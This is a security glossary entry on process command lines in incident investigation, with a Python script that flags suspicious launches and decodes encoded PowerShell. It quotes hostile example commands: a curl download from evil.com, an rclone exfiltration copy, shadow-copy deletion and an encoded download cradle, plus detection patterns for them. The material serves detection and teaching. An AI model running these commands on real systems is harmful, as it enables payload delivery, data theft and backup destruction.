Process_commandline
Definition
A process command line is the **exact text used to launch a process**: the program name plus any arguments or options passed to it. If a process is the running instance of a program, the command line is the "recipe" that started it. It tells you:

* **What executable was run** (`powershell.exe`, `python.exe`, `cmd.exe`)
* **Where it was run from**, when the launcher passed a path (most logs also record the image path as a separate field, which is the more reliable source)
* **What parameters or files were given to it** (scripts, commands, URLs, flags)

Example:

```
powershell.exe -ExecutionPolicy Bypass -File .\backup.ps1
```

Here the process is `powershell.exe` and the arguments are `-ExecutionPolicy Bypass -File .\backup.ps1`.

In investigations the process command line is a goldmine, because attackers often use legitimate tools in suspicious ways, a technique known as **Living off the Land**. The command line can reveal:

* Malware execution paths (`C:\Users\Public\malware.exe`)
* Hidden scripts being run (`cmd.exe /c hidden.vbs`)
* Suspicious network calls (`curl http://evil.com/payload.exe -o C:\temp\bad.exe`)
* Data exfiltration attempts (`rclone copy C:\Data remote:bucket`)

Security tools and logs often capture the command line for each process so analysts can spot anomalies. On Windows, Sysmon Event ID 1 records it by default, while Security event 4688 only includes it once the "Include command line in process creation events" audit policy is enabled. For example, seeing `powershell.exe` isn't always bad, but `powershell.exe -nop -w hidden -enc ...` (followed by a long Base64 blob) is a major red flag: `-enc` is short for `-EncodedCommand`, whose argument is the Base64 of a UTF-16LE script, so decode it before deciding what the process was doing.

Two caveats. The command line is text supplied by whoever started the process, so it can be padded, truncated by the logging pipeline, or spoofed in memory; read it alongside the image path, parent process and user account. And the same text can be routine for an administrator and malicious for an intruder, so context decides.

Real-world examples:

* Many ransomware strains are caught early because their process command line reveals commands like `vssadmin delete shadows /all /quiet` (used to delete Volume Shadow Copies, the local backups Windows keeps).
* The 2021 HAFNIUM Exchange Server attacks used suspicious `cmd.exe` and `powershell.exe` command lines to dump credentials and create web shells.
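The decode-and-match workflow described above, as an added Python example that is not part of this glossary entry. The process-creation events are constructed for the example, the regex rules and the ATT&CK labels on them are this example's own assumptions (not an official rule set), and the `-enc` blob is built by the same helper that later decodes it, so the script runs offline:

```python
import base64
import re
from dataclasses import dataclass
from typing import Dict, List, Optional

# Added example, not code from the glossary page. It triages process command
# lines the way an analyst would: match living-off-the-land patterns, decode
# PowerShell -EncodedCommand blobs (Base64 over UTF-16LE) and scan the decoded
# script as well. Field names mirror Sysmon Event ID 1 / Security event 4688.


@dataclass
class Finding:
    pid: int
    rule: str
    evidence: str


# Rule names carry ATT&CK technique IDs as labels; the patterns are assumptions
# of this example. Every pattern needs whitespace, '\', '(' or '-' to match, so
# none of them can fire inside a Base64 blob on the raw command line.
RULES = [
    ("T1490 shadow copy deletion",
     re.compile(r"(?i)\bvssadmin(\.exe)?\s+delete\s+shadows\b")),
    ("T1105 download to disk with curl/wget",
     re.compile(r"(?i)\b(curl|wget)(\.exe)?\s.*https?://\S+.*\s-[oO](\s|$)")),
    ("T1567 exfiltration with rclone",
     re.compile(r"(?i)\brclone(\.exe)?\s+(copy|sync|move)\s")),
    ("T1564.003 hidden PowerShell window",
     re.compile(r"(?i)\s-w(indowstyle)?\s+hidden\b")),
    ("T1059.001 download cradle",
     re.compile(r"(?i)\bIEX\s*\(|Invoke-Expression|Invoke-WebRequest|Download(String|File)\(")),
    ("T1059.005 script file launched via cmd /c",
     re.compile(r"(?i)\bcmd(\.exe)?\s+/c\s+\S*\.(vbs|js|wsf|bat)\b")),
    ("execution from user-writable path",
     re.compile(r"(?i)[A-Z]:\\(Users\\Public|Temp|Windows\\Temp)\\|\\AppData\\Local\\Temp\\")),
]

# -EncodedCommand and the abbreviations PowerShell accepts (-e, -ec, -enc).
ENC_RE = re.compile(r"(?i)(?:^|\s)-(?:e|ec|enc|encodedcommand)\s+([A-Za-z0-9+/=]{16,})")


def encode_powershell(script: str) -> str:
    """Build an -EncodedCommand argument: Base64 over UTF-16LE, as PowerShell expects."""
    return base64.b64encode(script.encode("utf-16le")).decode("ascii")


def decode_powershell(blob: str) -> Optional[str]:
    """Reverse encode_powershell; None when the blob is not valid Base64/UTF-16LE."""
    try:
        return base64.b64decode(blob, validate=True).decode("utf-16le")
    except (ValueError, UnicodeDecodeError):
        return None


def analyze(event: dict) -> List[Finding]:
    """Run every rule over one event's command line, plus over any decoded payload."""
    pid, cmd = event["pid"], event["cmdline"]
    findings = [Finding(pid, name, cmd) for name, pat in RULES if pat.search(cmd)]
    m = ENC_RE.search(cmd)
    if m:
        decoded = decode_powershell(m.group(1))
        findings.append(Finding(pid, "T1059.001 encoded PowerShell",
                                decoded if decoded is not None else "<undecodable blob>"))
        if decoded is not None:
            # The real intent lives in the decoded script, so scan that too.
            findings += [Finding(pid, f"{name} (decoded)", decoded)
                         for name, pat in RULES if pat.search(decoded)]
    return findings


def triage(events: List[dict]) -> Dict[int, List[str]]:
    """Map each PID that tripped at least one rule to the names of those rules."""
    out: Dict[int, List[str]] = {}
    for ev in events:
        hits = [f.rule for f in analyze(ev)]
        if hits:
            out[ev["pid"]] = hits
    return out


# Constructed sample telemetry (not real logs); the encoded payload is built here.
ENCODED = encode_powershell("IEX (New-Object Net.WebClient).DownloadString('http://evil.com/a.ps1')")
SAMPLE_EVENTS = [
    {"pid": 4120, "image": r"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe",
     "cmdline": r"powershell.exe -ExecutionPolicy Bypass -File .\backup.ps1"},
    {"pid": 4188, "image": r"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe",
     "cmdline": "powershell.exe -nop -w hidden -enc " + ENCODED},
    {"pid": 5001, "image": r"C:\Windows\System32\vssadmin.exe",
     "cmdline": "vssadmin delete shadows /all /quiet"},
    {"pid": 5120, "image": r"C:\Windows\System32\curl.exe",
     "cmdline": r"curl http://evil.com/payload.exe -o C:\temp\bad.exe"},
    {"pid": 5200, "image": r"C:\Users\Public\malware.exe",
     "cmdline": r"C:\Users\Public\malware.exe --install"},
    {"pid": 5300, "image": r"C:\Program Files\rclone\rclone.exe",
     "cmdline": r"rclone copy C:\Data remote:bucket"},
    {"pid": 5400, "image": r"C:\Windows\System32\cmd.exe",
     "cmdline": r"cmd.exe /c hidden.vbs"},
    {"pid": 5500, "image": r"C:\Windows\System32\cmd.exe",
     "cmdline": r'cmd.exe /c "dir C:\Users"'},
]

if __name__ == "__main__":
    for pid, rules in triage(SAMPLE_EVENTS).items():
        print(pid, "->", "; ".join(rules))
```

The benign `backup.ps1` launch and the plain `dir` produce no findings, while the encoded PowerShell line yields three: the hidden window seen on the raw command line, the fact that it is encoded, and the download cradle that only becomes visible after decoding. Treat the rule list as a starting point for a hunt, not a verdict: a match still needs the parent process, user and host context before it becomes an incident.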
Further reading:

* Microsoft Docs – [https://learn.microsoft.com/en-us/windows/win32/procthread/process-creation-flags](https://learn.microsoft.com/en-us/windows/win32/procthread/process-creation-flags)
* SANS – Hunting with Process Command Lines: [https://www.sans.org/blog/hunting-for-command-lines/](https://www.sans.org/blog/hunting-for-command-lines/)
* MITRE ATT&CK – Command and Scripting Interpreter: [https://attack.mitre.org/techniques/T1059/](https://attack.mitre.org/techniques/T1059/)